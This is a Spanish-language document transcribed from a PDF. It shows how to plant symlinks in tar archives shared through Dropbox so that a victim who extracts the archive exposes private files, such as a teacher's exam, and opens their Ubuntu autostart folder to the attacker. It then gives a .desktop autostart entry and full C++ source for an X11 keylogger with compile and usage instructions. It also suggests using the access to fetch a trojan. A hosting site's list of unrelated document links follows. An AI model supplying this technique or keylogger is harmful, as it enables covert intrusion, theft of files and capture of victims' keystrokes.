Dropbox + symlinks = Privacidad(0)

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Dropbox + symlinks = Privacidad(0)"

Transcripción

1 Dropbox + symlinks = Privacidad(0) Introducción: En este documento intentaré explicaros como Dropbox se puede convertir en un enemigo de vuestra privacidad. Ya cuando se empezaron a usar los programas P2P masivamente, se le empezó a dar importancia a que archivos de tu ordenador compartes con internet y cuales no. Mucha gente, sin darse cuenta, al usar un programa de intercambio p2p estaba permitiendo que cualquier persona robara información personal que el estaba compartiendo. Con el uso de los nuevos servicios en la nube la situación no ha cambiado, sin darte cuenta podrías estar compartiendo información personal con terceros; es más, como describiré en este documento, alguien podría forzar tu ordenador a compartir archivos en la nube, o incluso modificar archivos sensibles de tu equipo. A continuación expondré dos casos de ejemplo. Caso 1: Tenemos dos ordenadores con Dropbox el de un Alumno, y el de un Profesor. El alumno quiere robar un examen que el profesor tiene en su carpeta personal. Además, ese alumno le tiene que entregar una practica a ese profesor. Lo primero que hace el alumno es crear un link simbolico a donde cree que el profesor tiene guardado el examen: (supone el que el profesor tiene la siguiente estructura de carpetas: Carpeta personal -> Carpeta Dropbox -> Carpeta compartida con el alumno -> Carpeta donde se extraera el archivo) ln -s../../../examen./.examen En el caso de no saber donde tiene el examen podría enlazar su carpeta home entera. ln -s /home/./.examen O ir poco a poco bajando en el arbol de directorios de la siguiente forma ln -s../../.examennivel1 ; ln -s../../../.examennivel2 ; etc

2 Bien, ahora el alumno tiene un link simbólico que, colocado en la carpeta compartida con el profesor y estando en el ordenador del profesor, apuntaría al examen. (Pero que en su ordenador, es un link roto) El alumno empaqueta todos los archivos de su trabajo, y en ese paquete, también mete el link que acaba de crear (Diagrama es el archvo que le tiene que enviar al profesor, para más credibilidad, habría muchos mas ficheros) (Examen es el link simbolico que hemos creado; lleva un punto al principio para que sea un archivo oculto, y haya menos posibilidades de que el profesor vea el engaño) tar -cvf Trabajo.tar./.Examen./Diagrama El alumno pone el archivo creado en dropbox. El profesor recibirá el archivo, vera que es un.tar, y lo extraerá. La magia ya esta hecha, cuando el profesor extraiga el.tar, el link simbolico reaccionara y se enlazará con el examen. Acto seguido, como dropbox detecta que ahí hay un archivo, procederá a compartirlo con el alumno. El examen ya es nuestro!! Caso 2: Vale, esto ya es un poco mas serio: Un compañero te ha jodido bien, así que se la vas a devolver. El objetivo es meterle un keylogger en su equipo. Resulta que tenéis una carpeta compartida en Dropbox, asi que siguiendo el ejemplo anterior, vas crear un enlace simbólico; pero esta vez a una ruta especial: (asumimos la misma estructura de directorios que antes) ln -s../../../.config/autostart./.link En $HOME/.config/autostart se almacenan los scripts que se ejecutan (a nivel de usuario) al iniciar sesión en Ubuntu. Lo que hacemos, es crear un link a esa ruta, para introducirle un script. Acto seguido, empaquetamos cualquier cosa que tengamos que compartir con esa persona. tar -cvf Trabajo.tar./.link./Diagrama Y como antes, compartimos ese archivo con el.

3 Cuando lo descomprima, tendremos acceso a su carpeta autostart. Allí colocaremos nuestro keylogger y un fichero.desktop con el siguiente codigo. [Desktop Entry] Type=Application Exec=sh -c '$HOME/.config/autostart/keylogger' Hidden=false NoDisplay=false X-GNOME-Autostart-enabled=true Name[es_ES]=keylogger Name=keylogger Comment[es_ES]= Comment= Cuando el usuario reinicie el equipo, Ubuntu ejecutara sh -c '$HOME/.config/autostart/keylogger', osea, nuestro keylogger. A partir de aquí ya esta todo funcionando: Tan solo tenemos que esperar sentados y recibir los logs. Conclusión: Como hemos visto, sin matarnos mucho podemos infiltrarnos en un ordenador remoto; si un alumno de informática puede hacer esto, que será capaz de hacer un experto en seguridad? Esto es un primer paso, seguramente habrá gente que pueda mejorar la idea, o extenderla a otras plataformas (por ejemplo Dropbox para smartphones). Una cosa a tener en cuenta, es que la víctima en principio va ver toda la actividad de Dropbox, así que es recomendable usar ese túnel lo mínimo posible: Por ejemplo, tan solo colarle un script que lo que haga sea bajarse tu herramienta de administración remota favorita (aka troyano). Tomará Dropbox alguna medida?

4 Bonus: No sabes muy bien como funciona un keylogger, no encuentras uno que te guste, o simplemente quieres uno que funcione con el ejemplo que he puesto? Pues estas de suerte, porque he programado uno en C++ (prácticamente C) y lo adjunto en este documento. Aquí lo tienes! Se compila con g++ -o "keylogger"./keylogger.c -lx11 Y su funcionamiento es el siguiente: Puedes llamarlo sin parámetros o con los tres siguientes: Retardo entre encuestas a X11; retardo entre guardados en el disco, y lugar donde se guardará el log. Un ejemplo:./keylogger 5 10./log Lo primero que va hacer el keylogger es cargar en memoria el mapa de teclas (initkeys). La librería X11 te devuelve el numero asociado a la tecla, por eso tienes que hacer tu la traducción. A continuación inicia las variables de acuerdo con los parámetros que le has pasado (o que no le has pasado) (initconstraints). Un factor a tener en cuenta, es que nuestro keylogger va a guardar el log en disco a intervalos regulares, si esos intervalos son muy grandes se podría perder información, y si son muy pequeños se sobrecargaría el equipo. La solución que tomé se basa en capturar las señales que pueden terminar nuestro programa; cuando se detecta una de esas señales (SIGINT, SIGHUP, SIGTERM), se guarda el log que no se haya guardado hasta ahora, así los intervalos de guardado no tienen que ser muy cortos. Para empezar a comunicarnos con X11 lo primero que hacemos es XopenDisplay, esta llamada nos devuelve un objeto que usaremos para obtener las teclas que actúan sobre esa interfaz X11. Para obtener dichas teclas llamaremos continuamente a XqueryKeymap, que guardara el estado del teclado en un array que más tarde procesaremos. El estado de las teclas se guarda en un array de 32 bytes y cada uno de esos bytes contiene el estado de 8 teclas. Hay que tener cuidado al procesarlo porque en cada byte, el bit menos significativo es en realidad la primera tecla que buscamos. Miramos que ese bit sea un uno if (num & 0x01), y a continuación comprobamos que la tecla no estuviera ya pulsada en la iteración anterior. Si no comprobaramos esto, en vez de hola, obtendríamos hhhhooollllllllaaaa (vamos, ilegible...). Finalmente solo nos queda guardar el log de vez en cuando writelog();currentlog.clear(); En las siguientes páginas puedes ver el código. Espero que no haya sido demasiado tostón la explicación!

5 #include <X11/Xlib.h> #include <X11/Xutil.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/time.h> #include <string.h> #include <iostream> #include <fstream> #include <signal.h> using namespace std; // Global variables string currentlog; string savepath; Display *display; * Stores key mapping void initkeys(char keymap[256]) for (int i=0; i<256;i++) keymap[i]=' '; keymap[10] = '1'; keymap[11] = '2'; keymap[12] = '3'; keymap[13] = '4'; keymap[14] = '5'; keymap[15] = '6'; keymap[16] = '7'; keymap[17] = '8'; keymap[16] = '9'; keymap[17] = '0'; keymap[24] = 'q'; keymap[25] = 'w'; keymap[26] = 'e'; keymap[27] = 'r'; keymap[28] = 't'; keymap[29] = 'y'; keymap[30] = 'u'; keymap[31] = 'i'; keymap[32] = 'o'; keymap[33] = 'p'; keymap[36] = '\n'; keymap[38] = 'a'; keymap[39] = 's'; keymap[40] = 'd'; keymap[41] = 'f'; keymap[42] = 'g'; keymap[43] = 'h'; keymap[44] = 'j'; keymap[45] = 'k'; keymap[46] = 'l';

6 keymap[47] = 'ñ'; keymap[52] = 'z'; keymap[53] = 'x'; keymap[54] = 'c'; keymap[55] = 'v'; keymap[56] = 'b'; keymap[57] = 'n'; keymap[58] = 'm'; keymap[65] = ' '; * Writes current user input to log file void writelog() ofstream logfile; logfile.open (savepath.c_str(),ios_base::app); logfile << currentlog; logfile.close(); * Calls writelog when a signal is passed to the process void signalhandler (int n) writelog(); XCloseDisplay(display); exit(0); * Initialization function void initconstraints(int argc, char *argv[], int &timeconstraint, int &saveconstraint) // Sets default log file path char *home; home = getenv ("HOME"); savepath.append(home); savepath.append("/.config/autostart/log"); // Gets data from arguments if (argc == 4) timeconstraint = atoi(argv[1]); saveconstraint = atoi(argv[2]); savepath.clear(); savepath.append(argv[3]); * Sets interruption/termination signal handler

7 * This is recommended to do, because we want to save * the current log string when the program closes, * otherwise we would lose it signal(sigint, signalhandler); signal(sighup, signalhandler); signal(sigterm, signalhandler); int main(int argc, char *argv[]) int timeconstraint = 3; int saveconstraint = 10; char keymap[256]; char keys[32]; bool pressed[256]; bool prevpressed[256]; int iterations = 0; initkeys(keymap); initconstraints(argc, argv, timeconstraint, saveconstraint); display = XOpenDisplay(NULL); DefaultScreen(display); currentlog.clear(); // Kelylogger loop while(1) iterations++; * XQeryKeymap stores key state in a 32 byte array * each bit represents a key state. * Byte N contains the bits for keys 8N to 8N + 7 * Bear in mind this: * The least-significant bit represents key 8N. * So the keys representation would be something like * [7,6,5,4,3,2,1,0];[15,14,13,12,11,10,9,8]... XQueryKeymap(display,keys); for (int i=0; i<32; i++) if (keys[i]!= 0) int pos = 0; int num = keys[i]; while (pos < 8) if (num & 0x01) pressed[i*8+pos] = true;

8 "hhhhheeeeeeellllllllllllllooooo" else * We just want to see new keys * Otherwise, instead of "hello" * We would see if(!prevpressed[i*8+pos]) currentlog.append(&keymap[i*8+pos],1); pressed[i*8+pos] = false; // Go for the next key pos++; * When dividing a binary number by 2 * we eliminate the last digit: * 1010 / 2 = 101 num /= 2; else for (int a=(i*8); a<(i*8+8); a++) pressed[a] = false; // Save currently pressed keys memcpy(prevpressed, pressed, sizeof(prevpressed)); // Save timer if (iterations > saveconstraint*1000/timeconstraint) writelog(); currentlog.clear(); iterations = 0; // Keylogger loop timer usleep(timeconstraint * 1000); Autor: Esteban Pardo Sánchez Agradecimientos a Víctor Cao Rodríguez

Práctica de gsoap. int ns enviar (unsigned nodo, std::string cadena, std::string &resultado); int ns recibir(unsigned nodo, std::string &resultado);

Práctica de gsoap. int ns enviar (unsigned nodo, std::string cadena, std::string &resultado); int ns recibir(unsigned nodo, std::string &resultado); Práctica de gsoap Para desarrollar programas que utilicen gsoap para llevar a cabo las comunicaciones, debemos bajar el paquete gsoap linux 2.7.tgz disponible en: http://atc.ugr.es/pedro/docencia/irhc/irhc.html

Más detalles

Prof. Dr. Paul Bustamante

Prof. Dr. Paul Bustamante Prácticas de C++ Practica Nº 10 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante INDICE 1.1 EJERCICIO 1: MI PRIMER FICHERO EN BINARIO... 1 1.2 EJERCICIO 2: LEYENDO MI PRIMER FICHERO

Más detalles

El lenguaje de Programación C. Fernando J. Pereda

El lenguaje de Programación C. Fernando J. Pereda <ferdy@gentoo.org> El lenguaje de Programación C Fernando J. Pereda Por qué aprender C? Portable y muy extendido Estándar (C89, C99) El lenguaje de los sistemas Un lenguaje fácil (no, no es broma) Por

Más detalles

ALMACENAMIENTO PERSISTENTE DE DATOS

ALMACENAMIENTO PERSISTENTE DE DATOS UNIVERSIDAD DE MÁLAGA Dpto. Lenguajes y CC. Computación E.T.S.I. Telecomunicación ALMACENAMIENTO PERSISTENTE DE DATOS Tema 1 Programación II Programación II 0 Tema 1: ALMACENAMIENTO PERSISTENTE DE DATOS

Más detalles

Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web.

Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web. ALTA EN DROPBOX Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web. DROPBOX EN LA RED Nos vamos a cualquiera de los navegadores que tengamos

Más detalles

Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero.

Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Objetivos de la práctica: - Practicar uso de ficheros: abrir, cerrar y tratamiento de información contenida en el fichero. Uso de Ficheros Todas las estructuras de datos vistas hasta ahora utilizan la

Más detalles

Programación: QBASIC

Programación: QBASIC 1. QBASIC Programación: QBASIC Guía del alumno Qbasic es una versión moderna del lenguaje BASIC. Se trata de un lenguaje de alto nivel. En un lenguaje de alto nivel las instrucciones tienen un formato

Más detalles

Esquema de un programa en C: bloques básicos

Esquema de un programa en C: bloques básicos Esquema de un programa en C: bloques básicos // Incluimos los ficheros de cabecera que necesitemos. // Esto es un comentario #include #include // Si queremos definir alguna constante,

Más detalles

Examen escrito de Programación 1

Examen escrito de Programación 1 Examen escrito de Programación 1 Escuela de Ingeniería y Arquitectura Departamento de Informática e Ingeniería de Sistemas 2 de septiembre de 2015 Se debe disponer sobre la mesa en lugar visible un documento

Más detalles

Sistemas Operativos Práctica 3

Sistemas Operativos Práctica 3 Sistemas Operativos Práctica 3 Ing. Andrés Bustamante afbustamanteg@unal.edu.co Ingeniería de Sistemas Facultad de Ingeniería Universidad de la Amazonia 2009 1. Objetivo El objetivo de la práctica es que

Más detalles

Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1

Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 Examen Junio- Grupo A Lunes 17 de Junio - Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1.1 Ejercicio 1: Máquina Expendedora (3.5 ptos.)... 1 1.2 Ejercicio 2: Clase Circulo (1.0 pto.)... 3 1.3 Ejercicio

Más detalles

Creacion de Script. Que es un Script?

Creacion de Script. Que es un Script? Creacion de Script Que es un Script? Los scripts son un conjunto de instrucciones generalmente almacenadas en un archivo de texto que deben ser interpretados línea a línea en tiempo real para su ejecución,

Más detalles

Ejercicio: Mensajes Alert, Confirm y Prompt

Ejercicio: Mensajes Alert, Confirm y Prompt Ejercicio: Mensajes Alert, Confirm y Prompt Utilizando Javascript podemos crear tres diferentes tipos de mensajes emergentes que se pueden usar para mostrar información, obtener confirmación u obtener

Más detalles

Prof. Dr. Paul Bustamante

Prof. Dr. Paul Bustamante Prácticas de C++ Practica Nº 1 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante Prácticas de Programación en C++ Pág. 1 ÍNDICE ÍNDICE... 1 1. Introducción... 1 1.1 Ejercicio 1: Cálculo

Más detalles

Tema 5: Diseño modular. Índice. Notas. Programación 2. Curso 2014-2015. Notas. Ejemplo. La herramienta make. 1 Diseño modular.

Tema 5: Diseño modular. Índice. Notas. Programación 2. Curso 2014-2015. Notas. Ejemplo. La herramienta make. 1 Diseño modular. : Programación 2 Curso 2014-2015 Índice 1 2 3 (1/2) Cuando el programa crece es necesario dividirlo en módulos Cada módulo agrupa una serie de funciones con algo en común El módulo puede reutilizarse en

Más detalles

INSTALAR UBUNTU DESDE WINDOWS

INSTALAR UBUNTU DESDE WINDOWS INSTALAR UBUNTU DESDE WINDOWS Índice de contenido 1.Descargar Ubuntu 10.04 Lucid Lynx...3 2.Grabar la imagen descargada en un CD...3 2.1.Grabación de una imagen iso con Nero...3 2.2.Grabación de una imagen

Más detalles

Arquitectura de Computadores: Exámenes y Controles

Arquitectura de Computadores: Exámenes y Controles 2º curso / 2º cuatr. Grado en Ing. Informática Doble Grado en Ing. Informática y Matemáticas Arquitectura de Computadores: Exámenes y Controles Examen de Prácticas AC 05/07/2013 resuelto Material elaborado

Más detalles

Kosmo Desktop Manual de desarrollo Instalación y configuración del código fuente de Kosmo en Eclipse

Kosmo Desktop Manual de desarrollo Instalación y configuración del código fuente de Kosmo en Eclipse Kosmo Desktop Manual de desarrollo Instalación y configuración del código fuente de Kosmo en Eclipse Versión 3.0 02/12/2010 2 3 1 Control de versiones VERSIÓN AUTOR FECHA CAMBIO 1.0 SAIG, S.L. 22/03/2007

Más detalles

INSTALACION MANUAL DE ECLIPSE EN UBUNTU

INSTALACION MANUAL DE ECLIPSE EN UBUNTU INSTALACION MANUAL DE ECLIPSE EN UBUNTU Objetivos: Pasar correctamente un programa escrito en Pseudocódigo a C. Editar, compilar y comprobar el funcionamiento de programas usando un IDE. Resumen Cuando

Más detalles

DESCARGA Y CONVERSIÓN AUTOMÁTICA DE SERIES EN MAC TUTORIAL PARA EL GUMCAM POR LUIS BALAGUER V2.0

DESCARGA Y CONVERSIÓN AUTOMÁTICA DE SERIES EN MAC TUTORIAL PARA EL GUMCAM POR LUIS BALAGUER V2.0 DESCARGA Y CONVERSIÓN AUTOMÁTICA DE SERIES EN MAC TUTORIAL PARA EL GUMCAM POR LUIS BALAGUER V2.0 El sistema que detallamos en este tutorial permite automatizar completamente la descarga de series de TV,

Más detalles

TRUE CRYPT ::: Encriptación de datos :::

TRUE CRYPT ::: Encriptación de datos ::: TRUE CRYPT ::: Encriptación de datos ::: TrueCrypt está desarrollado bajo software libre y además es multiplataforma. Es muy importante estas dos premisas ya que no importará si trabajamos bajo Linux o

Más detalles

[Titulo] : Creacion de un Keylogger [Lenguaje] : C# [Autor] : Doddy Hackman. [Temario]

[Titulo] : Creacion de un Keylogger [Lenguaje] : C# [Autor] : Doddy Hackman. [Temario] [Titulo] : Creacion de un Keylogger [Lenguaje] : C# [Autor] : Doddy Hackman [Temario] -- =================-------- 0x01 : Introduccion 0x02 : Capturar Teclas 0x03 : Capturar el nombre de las ventanas activas

Más detalles

Tutorial para la comunicación TCP en el BMS Server

Tutorial para la comunicación TCP en el BMS Server Tutorial para la comunicación TCP en el BMS Server Contenido 1. Pasos iniciales para trabajar empleando conexión TCP... 2 2. Configuración de la conexión TCP... 4 2.1. Comprobación de la conexión TCP...

Más detalles

MANUAL PARA EL OPERADOR DE LA RED ANTARTICA DE LOS NILU

MANUAL PARA EL OPERADOR DE LA RED ANTARTICA DE LOS NILU MANUAL PARA EL OPERADOR DE LA RED ANTARTICA DE LOS NILU MEDIDAS DIARIAS Extracción automática de los datos Para capturar los datos se usará el programa wnilusender.exe y para graficar la salida de los

Más detalles

Instalación y Administración de un servidor VNC en Linux Ubuntu y un cliente en Windows.

Instalación y Administración de un servidor VNC en Linux Ubuntu y un cliente en Windows. Instalación y Administración de un servidor VNC en Linux Ubuntu y un cliente en Windows. En esta práctica se pretende instalar y administrar un servidor VNC en Linux y un cliente VNC Windows. Con lo cual,

Más detalles

Bases de datos. 1. Introducción

Bases de datos. 1. Introducción Bases de datos 1. Introducción Habitualmente, los programas trabajan con información que está en un fichero. Por ejemplo, nuestro simulador de tráfico aéreo trabaja con una lista de planes de vuelo que

Más detalles

Examen Principios de Programación Febrero 2012

Examen Principios de Programación Febrero 2012 Por favor siga las siguientes indicaciones: Escriba con lápiz. Escriba su nombre y número de documento en todas las hojas que entregue. Numere las hojas e indique el total de hojas en la primera de ellas.

Más detalles

Laboratorio 7 Motor de búsqueda web basado en el TAD Árbol Binario de Búsqueda GUIÓN DEL LABORATORIO

Laboratorio 7 Motor de búsqueda web basado en el TAD Árbol Binario de Búsqueda GUIÓN DEL LABORATORIO Laboratorio 7 Motor de búsqueda web basado en el TAD Árbol Binario de Búsqueda GUIÓN DEL LABORATORIO 1.- Objetivos del laboratorio Diseño de clases en C++ Comprensión y uso del TAD Árbol Binario de Búsqueda

Más detalles

Instalación de Microsoft Virtual PC

Instalación de Microsoft Virtual PC Instalación de Microsoft Virtual PC Virtual PC es un software de Microsoft que permite instalar varios sistemas operativos en la misma máquina, sin tener que reiniciar Windows y además de forma segura,

Más detalles

Problemas de Redes de Computadores. Conjunto de problemas 1

Problemas de Redes de Computadores. Conjunto de problemas 1 Problemas de Redes de Computadores. Ingeniería Técnica en Informática de Gestión Conjunto de problemas 1 Pregunta 1.1: Si configuro mi servidor Web para que no acepte conexiones desde la dirección IP 130.206.1.1,

Más detalles

Problemas comunes en la integración del módulo V.me by Visa en Prestashop

Problemas comunes en la integración del módulo V.me by Visa en Prestashop Problemas comunes en la integración del módulo V.me by Visa en Prestashop Índice' 1.! NO%SE%MUESTRA%EL%MÉTODO%DE%PAGO%...%3! 1.1% LIMPIEZA!Y!DESACTIVACIÓN!DE!LA!CACHÉ!...!3% 1.1.1#Desactivar#/#Borrar#caché#Prestashop#1.4#...#3#

Más detalles

Fundamentos de programación I. - Anexo de Software -

Fundamentos de programación I. - Anexo de Software - Fundamentos de programación I - - 1. Introducción 1.1. Introducción a Dev-C++ y DJGPP 1.1.1. Qué es Dev-C++? Dev-C++ es un Entorno Integrado de Desarrollo (Integrated Development Environment, IDE) capaz

Más detalles

Mi primer proyecto en Dev-C++

Mi primer proyecto en Dev-C++ Mi primer proyecto en Dev-C++ Para realizar esta actividad deberás disponer de un ordenador en el que esté instalado el Dev-C++. Debes ir realizando cada uno de los pasos indicados, en el mismo orden en

Más detalles

Aprendizaje activo: flujos

Aprendizaje activo: flujos Clase 29 Aprendizaje activo: flujos La aplicación Logger 2 1 Objetivos En el marco de trabajo de la aplicación Logger, analizaremos tres formas de leer y escribir datos utilizando flujos de Java: 1. como

Más detalles

Para leer la entrada de consola, lo primero que se hace es construir un Scanner que este asociado al flujo de entrada estándar System.

Para leer la entrada de consola, lo primero que se hace es construir un Scanner que este asociado al flujo de entrada estándar System. CICLO: 01/2010 Universidad Don Bosco Materia: Lenguaje de Programación III Contenido: 1-Lectura de Datos de entrada. 2-Introduccion a JOPTIONPANE. 3-Estructuras de Control. ->LECTURA DE DATOS DE ENTRADA

Más detalles

Sesión 1. Comandos básicos. Curso 09/10. Fernando Rincón Escuela Superior de Informática Universidad de Castilla-La Mancha

Sesión 1. Comandos básicos. Curso 09/10. Fernando Rincón Escuela Superior de Informática Universidad de Castilla-La Mancha Curso 09/10 Curso de Enseñanzas Propias Introducción a GNU/Linux Sesión 1 Comandos básicos Fernando Rincón Escuela Superior de Informática Universidad de Castilla-La Mancha Contenido Más administración

Más detalles

Hot Potatoes, aplicaciones educativas

Hot Potatoes, aplicaciones educativas Hot Potatoes, aplicaciones educativas Módulo 2: Instalación e idioma ÍNDICE MÓDULO 2. INSTALACIÓN E IDIOMA...1 Instalación y registro...2 Descarga en línea...3 Instalación...5 Instalación en Windows...6

Más detalles

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1 Introducción (1) Personal Home Page Qué es? Acrónimo de : Hypertext Preprocessor. Lenguaje interpretado de alto nivel que permite desarrollar fácilmente páginas dinámicas. Similar a los lenguajes C y Perl.

Más detalles

Práctica 2: Simón dice

Práctica 2: Simón dice Práctica 2: Simón dice Fecha de entrega: 31 de enero de 2016 0.- Descripción del juego (Wikipedia.org) Simon dice es un juego electrónico, creado por Ralph Baer, que consiste en reproducir una secuencia

Más detalles

Lenguajes de Programación Curso 04-05. Práctica 4. Herencia. Utilización de interfaces y clases abstractas. 1. Interfaces 1. 2. Clases abstractas 2

Lenguajes de Programación Curso 04-05. Práctica 4. Herencia. Utilización de interfaces y clases abstractas. 1. Interfaces 1. 2. Clases abstractas 2 Objetivos Herencia. Utilización de interfaces y clases abstractas. Índice 1. Interfaces 1 2. Clases abstractas 2 3. Collections Framework 3 3.1. Collection........................................... 3

Más detalles

TEMA 3: EL LENGUAJE C: PRESENTACIÓN

TEMA 3: EL LENGUAJE C: PRESENTACIÓN TEMA 3: EL LENGUAJE C: PRESENTACIÓN Historia del lenguaje C Características del lenguaje C Estructura de un programa en C El editor de textos: elementos Funciones: de usuario y de librería Librerías de

Más detalles

PROGRAMACIÓN N C++ CONSTRUCTORES PROG.C++ L11 CONSTRUCTORES DEL LENGUAJE

PROGRAMACIÓN N C++ CONSTRUCTORES PROG.C++ L11 CONSTRUCTORES DEL LENGUAJE L11 CONSTRUCTORES DEL LENGUAJE CLASES class { } PLANTILLAS template { } ESPACIOS DE NOMBRES namespace { } EXCEPCIONES try catch.. SOBRECARGA DE OPERADORES operator (parametros) BIBLIOTECA

Más detalles

Conexión SFTP-SSH2 en PHP a través de un fichero.ppk

Conexión SFTP-SSH2 en PHP a través de un fichero.ppk Conexión SFTP-SSH2 en PHP a través de un fichero.ppk Necesitamos nuestro fichero.ppk Necesitamos crear 2 ficheros de texto plano, uno sin extensión, donde añadiremos una clave privada que tendremos que

Más detalles

Obtener un backup de los diagramas lógicos de cualquier ES sobre dbkopie y el listado de todos esos diagramas lógicos del FUP Editor y de OM en pdf.

Obtener un backup de los diagramas lógicos de cualquier ES sobre dbkopie y el listado de todos esos diagramas lógicos del FUP Editor y de OM en pdf. Obtener un backup de los diagramas lógicos de cualquier ES sobre dbkopie y el listado de todos esos diagramas lógicos del FUP Editor y de OM en pdf. Cada cierto tiempo merece la pena tener actualizado

Más detalles

COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN

COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN Qué es Cobian Backup? Cobian Backup es un programa multitarea que podemos usar para crear y restaurar copias de seguridad de nuestros archivos

Más detalles

SOLUCION EXAMEN junio 2006

SOLUCION EXAMEN junio 2006 SOLUCION EXAMEN junio 2006 1. Explique razonadamente si las siguientes afirmaciones son verdaderas o falsas: I) (1 p) En UNIX únicamente se distinguen dos tipos de procesos: los procesos de usuario y los

Más detalles

Este taller estará orientado a aquellas personas que no han visto jamás Python y también a aquellos que quieran pasar de Python 2 al 3

Este taller estará orientado a aquellas personas que no han visto jamás Python y también a aquellos que quieran pasar de Python 2 al 3 Introducción En este taller veremos las novedades sobre Python 3, que cosas nuevas e interesantes trae, que lo diferencia con Python 2, a demás conoceremos los depuradores que trae. Miraremos por arriba

Más detalles

Tutorial Bullet 3D Tema 1 Introducción a Bullet 3D. 1. Introducción a Bullet 3D

Tutorial Bullet 3D Tema 1 Introducción a Bullet 3D. 1. Introducción a Bullet 3D 1. Bullet 3D (http://bulletphysics.org) es un motor 3D utilizado en videojuegos de última generación (Madagascar Kart para X-Box 360) y efectos especiales de películas recientes (2012). Nos ofrece un conjunto

Más detalles

Programación Estructurada

Programación Estructurada Programación Estructurada PROGRAMACIÓN ESTRUCTURADA 1 Sesión No. 11 Nombre: Manejo de archivos Contextualización En los lenguajes de programación estructurada como C, que carecían de una conexión a base

Más detalles

Introducción al laboratorio de Programación I

Introducción al laboratorio de Programación I Introducción al laboratorio de Programación I Manuel Montenegro montenegro@fdi.ucm.es es Despacho B12 Compilación Es el proceso de transformación de un programa escrito en un lenguaje de alto nivel (en

Más detalles

1 Estructura básica de un programa C++

1 Estructura básica de un programa C++ Elementos básicos de un lenguaje de alto nivel: C++ CONTENIDOS 1. Estructura básica de un programa C++. 2. Tipos de datos simples. 3. Constantes y variables en C++. Declaración. 4. Operadores y expresiones.

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor Web Apache Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor Web

Más detalles

Repaso de las características más importantes de la programación Java y su adaptación a Android

Repaso de las características más importantes de la programación Java y su adaptación a Android Repaso de las características más importantes de la programación Java y su adaptación a Android 1. Entorno de programación en java 2. Variables y tipos de datos 3. Operaciones y operadores 4. Clases y

Más detalles

DiskLogon - Logon en Windows con un Pendrive USB

DiskLogon - Logon en Windows con un Pendrive USB 1 de 10 07/05/2008 23:13 DiskLogon - Logon en Windows con un Pendrive USB DiskLogon - Logearse en Windows con un USB, A partir de este documento, veremos la tremenda disponibilidad que nos permite este

Más detalles

Instituto Tecnológico de Las Américas (ITLA)

Instituto Tecnológico de Las Américas (ITLA) Instituto Tecnológico de Las Américas (ITLA) Nombre: Gregori Carmona Lorenzo ID: 2011-2435 Asignatura: Sistemas Operativos III Instructor: José Doñe Tema: Practica extra: Apache Un servidor web es un programa

Más detalles

EDITRAN/TR. Windows/Unix. Manual de referencia

EDITRAN/TR. Windows/Unix. Manual de referencia EDITRAN/TR Windows/Unix Manual de referencia INDRA 30 de octubre de 2014 ÍNDICE 1. INTRODUCCIÓN.... 1-1 2. INTERFAZ DE PROGRAMACIÓN.... 2-1 2.1. DESCRIPCION... 2-1 2.2. FUNCIONES DE ENVIO Y RECEPCION...

Más detalles

FacePhi SDK Linux. Instalación y activación de licencias. Guía de instalación

FacePhi SDK Linux. Instalación y activación de licencias. Guía de instalación FacePhi SDK Linux Instalación y activación de licencias Guía de instalación FacePhi 2016 FacePhi Biometria. Todos los derechos reservados. El logotipo FacePhi y F7 Face Recognition son marcas comerciales

Más detalles

ATLAS MANUAL DE USUARIO DEL INSTALADOR INNO SETUP 5 Versión 1.0 UNIDAD DE ARQUITECTURA DE SOFTWARE DE APLICACIONES

ATLAS MANUAL DE USUARIO DEL INSTALADOR INNO SETUP 5 Versión 1.0 UNIDAD DE ARQUITECTURA DE SOFTWARE DE APLICACIONES ATLAS MANUAL DE USUARIO DEL INSTALADOR INNO SETUP 5 Versión 1.0 UNIDAD DE ARQUITECTURA DE SOFTWARE DE APLICACIONES Hoja de Control Título MANUAL DE USO DEL INSTALADOR INNO SETUP 5 Documento de Referencia

Más detalles

Contenidos. Archivos en C++ Archivos en C++ Introducción

Contenidos. Archivos en C++ Archivos en C++ Introducción Contenidos 1. Introducción. 2. Manipulación de ficheros. 3. Organización de archivos. 4. Tipo de almacenamiento. 5. Biblioteca de flujos. 6. Operaciones asociadas a archivos: Abrir fichero, Cerrar fichero,

Más detalles

Introducción a la Programación en MATLAB

Introducción a la Programación en MATLAB Introducción a la Programación en MATLAB La programación en MATLAB se realiza básicamente sobre archivos M, o M-Files. Se los denomina de esta forma debido a su extensión.m. Estos archivos son simple archivos

Más detalles

FACULTAD DE INGENIERÍA

FACULTAD DE INGENIERÍA NOMBRE DEL PROFESOR: Ing. Héctor Manuel Quej Cosgaya NOMBRE DE LA PRÁCTICA: Variables y Tipos de Datos PRÁCTICA NÚM. [ 1 ] LABORATORIO: MATERIA: UNIDAD: TIEMPO: Centro de Ingeniería Computacional Lenguaje

Más detalles

DOCUMENTACIÓN DEL PROGRAMA

